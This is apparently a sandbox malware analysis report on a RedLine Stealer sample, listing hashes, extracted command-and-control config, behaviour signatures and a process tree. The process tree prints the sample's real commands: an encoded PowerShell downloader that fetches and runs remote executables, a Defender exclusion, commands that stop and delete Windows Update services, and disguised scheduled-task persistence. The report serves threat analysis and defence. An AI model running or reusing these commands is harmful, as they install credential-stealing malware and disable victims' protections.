redline | 404c51dbba49787d8c3d9cde78efc1a5eb0d9f139c0c6b130438870a0ecc244c

Analysis

max time kernel
150s
max time network
55s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
16/01/2023, 07:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

77d29818be0d01c38545baa0bd4551c6853c224b.exe
Size

365KB
MD5

343adbd49e24d1bdec30f634f4055da8
SHA1

77d29818be0d01c38545baa0bd4551c6853c224b
SHA256

404c51dbba49787d8c3d9cde78efc1a5eb0d9f139c0c6b130438870a0ecc244c
SHA512

4c6831539aef807c7cb4875306e5fecc06b769924e0a1f80a5316f194a5235ec9e904c932b3ec4021e7ef2237bc2dba3db47a8a1cb20244c67c9fa1e6d88298f
SSDEEP

6144:SVjDF2Bp0G3LkjLsvBrL0+ecB4X0Y37cWI+HLq11aWBLXAO1DAjWbc:SRDF2BpjLQLsvBP0+ecyEY37C8P

Score

10^/10

redline 1 evasion infostealer spyware

Malware Config

Extracted

Family

redline

Botnet

107.182.129.73:21733

Attributes

auth_value
3a5bb0917495b4312d052a0b8977d2bb

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 4 IoCs

resource	yara_rule
behavioral1/memory/816-79-0x0000000000080000-0x00000000000A0000-memory.dmp	family_redline
behavioral1/memory/816-84-0x000000000009ADAE-mapping.dmp	family_redline
behavioral1/memory/816-85-0x0000000000080000-0x00000000000A0000-memory.dmp	family_redline
behavioral1/memory/816-86-0x0000000000080000-0x00000000000A0000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 1648 created 1400	1648	SmartDefRun.exe	10
PID 1648 created 1400	1648	SmartDefRun.exe	10
PID 1648 created 1400	1648	SmartDefRun.exe	10
PID 1648 created 1400	1648	SmartDefRun.exe	10
PID 1644 created 412	1644	powershell.EXE	3

Blocklisted process makes network request 2 IoCs

flow	pid	Process
4	1152	powershell.exe
5	1152	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	SmartDefRun.exe

Executes dropped EXE 3 IoCs

pid	Process
2032	new2.exe
972	SysApp.exe
1648	SmartDefRun.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Loads dropped DLL 7 IoCs

pid	Process
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1632	WerFault.exe
1632	WerFault.exe
1632	WerFault.exe
1152	powershell.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1816 set thread context of 1068	1816	77d29818be0d01c38545baa0bd4551c6853c224b.exe	28
PID 2032 set thread context of 816	2032	new2.exe	35
PID 1648 set thread context of 832	1648	SmartDefRun.exe	56
PID 1644 set thread context of 1876	1644	powershell.EXE	62

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe	SmartDefRun.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
988	sc.exe
1188	sc.exe
1996	sc.exe
1036	sc.exe
436	sc.exe

Program crash 2 IoCs

pid	pid_target	Process	procid_target
1472	1816	WerFault.exe	26
1632	2032	WerFault.exe	32

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
824	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = a0bd1fef7a29d901	powershell.EXE

Suspicious behavior: EnumeratesProcesses 30 IoCs

pid	Process
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
972	SysApp.exe
972	SysApp.exe
972	SysApp.exe
972	SysApp.exe
972	SysApp.exe
816	vbc.exe
1648	SmartDefRun.exe
1648	SmartDefRun.exe
1988	powershell.exe
1648	SmartDefRun.exe
1648	SmartDefRun.exe
1648	SmartDefRun.exe
1648	SmartDefRun.exe
552	powershell.exe
1648	SmartDefRun.exe
1648	SmartDefRun.exe
1644	powershell.EXE
1348	powershell.EXE
1644	powershell.EXE
1876	dllhost.exe
1876	dllhost.exe
1876	dllhost.exe
1876	dllhost.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	1152	powershell.exe
Token: SeDebugPrivilege	816	vbc.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	552	powershell.exe
Token: SeDebugPrivilege	1644	powershell.EXE
Token: SeDebugPrivilege	1348	powershell.EXE
Token: SeDebugPrivilege	1644	powershell.EXE
Token: SeDebugPrivilege	1876	dllhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1816 wrote to memory of 1068	1816	77d29818be0d01c38545baa0bd4551c6853c224b.exe	28
PID 1816 wrote to memory of 1068	1816	77d29818be0d01c38545baa0bd4551c6853c224b.exe	28
PID 1816 wrote to memory of 1068	1816	77d29818be0d01c38545baa0bd4551c6853c224b.exe	28
PID 1816 wrote to memory of 1068	1816	77d29818be0d01c38545baa0bd4551c6853c224b.exe	28
PID 1816 wrote to memory of 1068	1816	77d29818be0d01c38545baa0bd4551c6853c224b.exe	28
PID 1816 wrote to memory of 1068	1816	77d29818be0d01c38545baa0bd4551c6853c224b.exe	28
PID 1816 wrote to memory of 1472	1816	77d29818be0d01c38545baa0bd4551c6853c224b.exe	29
PID 1816 wrote to memory of 1472	1816	77d29818be0d01c38545baa0bd4551c6853c224b.exe	29
PID 1816 wrote to memory of 1472	1816	77d29818be0d01c38545baa0bd4551c6853c224b.exe	29
PID 1816 wrote to memory of 1472	1816	77d29818be0d01c38545baa0bd4551c6853c224b.exe	29
PID 1068 wrote to memory of 1152	1068	vbc.exe	30
PID 1068 wrote to memory of 1152	1068	vbc.exe	30
PID 1068 wrote to memory of 1152	1068	vbc.exe	30
PID 1068 wrote to memory of 1152	1068	vbc.exe	30
PID 1152 wrote to memory of 2032	1152	powershell.exe	32
PID 1152 wrote to memory of 2032	1152	powershell.exe	32
PID 1152 wrote to memory of 2032	1152	powershell.exe	32
PID 1152 wrote to memory of 2032	1152	powershell.exe	32
PID 1152 wrote to memory of 972	1152	powershell.exe	34
PID 1152 wrote to memory of 972	1152	powershell.exe	34
PID 1152 wrote to memory of 972	1152	powershell.exe	34
PID 1152 wrote to memory of 972	1152	powershell.exe	34
PID 2032 wrote to memory of 816	2032	new2.exe	35
PID 2032 wrote to memory of 816	2032	new2.exe	35
PID 2032 wrote to memory of 816	2032	new2.exe	35
PID 2032 wrote to memory of 816	2032	new2.exe	35
PID 2032 wrote to memory of 816	2032	new2.exe	35
PID 2032 wrote to memory of 816	2032	new2.exe	35
PID 2032 wrote to memory of 1632	2032	new2.exe	36
PID 2032 wrote to memory of 1632	2032	new2.exe	36
PID 2032 wrote to memory of 1632	2032	new2.exe	36
PID 2032 wrote to memory of 1632	2032	new2.exe	36
PID 1152 wrote to memory of 1648	1152	powershell.exe	37
PID 1152 wrote to memory of 1648	1152	powershell.exe	37
PID 1152 wrote to memory of 1648	1152	powershell.exe	37
PID 1152 wrote to memory of 1648	1152	powershell.exe	37
PID 524 wrote to memory of 988	524	cmd.exe	45
PID 524 wrote to memory of 988	524	cmd.exe	45
PID 524 wrote to memory of 988	524	cmd.exe	45
PID 524 wrote to memory of 1188	524	cmd.exe	46
PID 524 wrote to memory of 1188	524	cmd.exe	46
PID 524 wrote to memory of 1188	524	cmd.exe	46
PID 524 wrote to memory of 1996	524	cmd.exe	47
PID 524 wrote to memory of 1996	524	cmd.exe	47
PID 524 wrote to memory of 1996	524	cmd.exe	47
PID 524 wrote to memory of 1036	524	cmd.exe	48
PID 524 wrote to memory of 1036	524	cmd.exe	48
PID 524 wrote to memory of 1036	524	cmd.exe	48
PID 524 wrote to memory of 436	524	cmd.exe	49
PID 524 wrote to memory of 436	524	cmd.exe	49
PID 524 wrote to memory of 436	524	cmd.exe	49
PID 524 wrote to memory of 588	524	cmd.exe	50
PID 524 wrote to memory of 588	524	cmd.exe	50
PID 524 wrote to memory of 588	524	cmd.exe	50
PID 552 wrote to memory of 824	552	powershell.exe	51
PID 552 wrote to memory of 824	552	powershell.exe	51
PID 552 wrote to memory of 824	552	powershell.exe	51
PID 524 wrote to memory of 632	524	cmd.exe	52
PID 524 wrote to memory of 632	524	cmd.exe	52
PID 524 wrote to memory of 632	524	cmd.exe	52
PID 524 wrote to memory of 884	524	cmd.exe	53
PID 524 wrote to memory of 884	524	cmd.exe	53
PID 524 wrote to memory of 884	524	cmd.exe	53
PID 524 wrote to memory of 1488	524	cmd.exe	54

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:464

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:412
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{7e31582b-bfd1-4ed5-a512-a15f64b92c12}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1876

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1400
- C:\Users\Admin\AppData\Local\Temp\77d29818be0d01c38545baa0bd4551c6853c224b.exe
  "C:\Users\Admin\AppData\Local\Temp\77d29818be0d01c38545baa0bd4551c6853c224b.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1816
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1068
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"
      4⤵
      Blocklisted process makes network request
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1152
    - - C:\Users\Admin\AppData\Local\Temp\new2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\new2.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2032
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:816
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 36
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:1632
    - - C:\Users\Admin\AppData\Local\Temp\SysApp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:972
    - - C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:1648
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 36
    3⤵
    - Program crash
    PID:1472
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1988
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:524
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:988
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1188
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1996
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1036
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:436
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:588
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:632
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:884
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:1488
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:552
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:824
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:832

C:\Windows\system32\taskeng.exe
taskeng.exe {29655853-BBEF-421C-B57B-CCDDCA4AFDBA} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:760
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+'WA'+[Char](82)+''+[Char](69)+'').GetValue(''+'d'+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](114)+''+'s'+'t'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1348
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+'F'+''+[Char](84)+''+'W'+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+'d'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'r'+[Char](115)+''+'t'+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1644

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

Filesize
3.7MB

MD5
f5c51e7760315ad0f0238d268c03c60e

SHA1
85ebaaa9685634143a72bc82c6e7df87a78eed4c

SHA256
ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

SHA512
d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

Filesize
3.7MB

MD5
f5c51e7760315ad0f0238d268c03c60e

SHA1
85ebaaa9685634143a72bc82c6e7df87a78eed4c

SHA256
ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

SHA512
d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe

Filesize
464KB

MD5
990c8e3fc56a2734631b51fc61a6779a

SHA1
55a16cc67fc52cdf0690387e083955048106d48a

SHA256
d80ce10659442d8e5b9c28e53bf254711881cf9502f52aeb8abf4a15c9e6e36e

SHA512
f5332bcae3242d86a58adf01069c425f5b22bdda9045200fb5b3d9ab3e983d94af8462a04e148b7164e8d6122ec2d198d18081850e00175bb257c0ddb3defdc5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
bf66a8f5d2cc433e55f0805b33072c29

SHA1
c6bab6877abd18425948b692df00dec8a47af6f2

SHA256
0499e8d623afd21f5d5518a01087c33b5a28582f344068c5a4a3be15d91cb571

SHA512
15ed38f1dd8bf697b95ec81fce512ed21581ca32dcd1fe2b111757be3c6cd1b94f91013fc1a113cb432067e16639671accfba0acdb03daf4ec8358024f3cf557

Download Submit
\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

Filesize
3.7MB

MD5
f5c51e7760315ad0f0238d268c03c60e

SHA1
85ebaaa9685634143a72bc82c6e7df87a78eed4c

SHA256
ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

SHA512
d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

Download Submit
\Users\Admin\AppData\Local\Temp\SysApp.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
\Users\Admin\AppData\Local\Temp\SysApp.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
